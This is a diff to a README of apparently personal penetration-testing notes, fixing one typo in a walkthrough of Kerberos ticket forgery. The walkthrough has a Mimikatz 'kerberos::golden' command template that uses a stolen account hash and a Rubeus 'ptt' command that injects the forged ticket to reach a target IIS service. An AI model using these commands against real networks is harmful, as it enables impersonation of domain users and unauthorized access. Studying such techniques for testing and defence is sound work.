encryptedninja/command-center/README.md

 * creating the ticket with Mimikatz:
 * `kerberos::golden /sid:<SID (remove last 4 digits after dash)> /domain:<Domain FQDN> /user:<user to impersonate (need user's hash too at the end)> /service:<service we are trying to connect to, in our example is HTTP> /target:<The target server (workstation-02.krbtown.local)> /rc4:<the password hash of the service account in our case Administrator>`
 * Mimikatz will save the output as ticket.kirbi
-* using Rubeus to lead the ticket into our current session:
+* using Rubeus to load the ticket into our current session:
 * `Rubeus.exe ptt /ticket:ticket.kirbi`
 * now we can connect to the iis_service from this session
 * **Golden Ticket attack**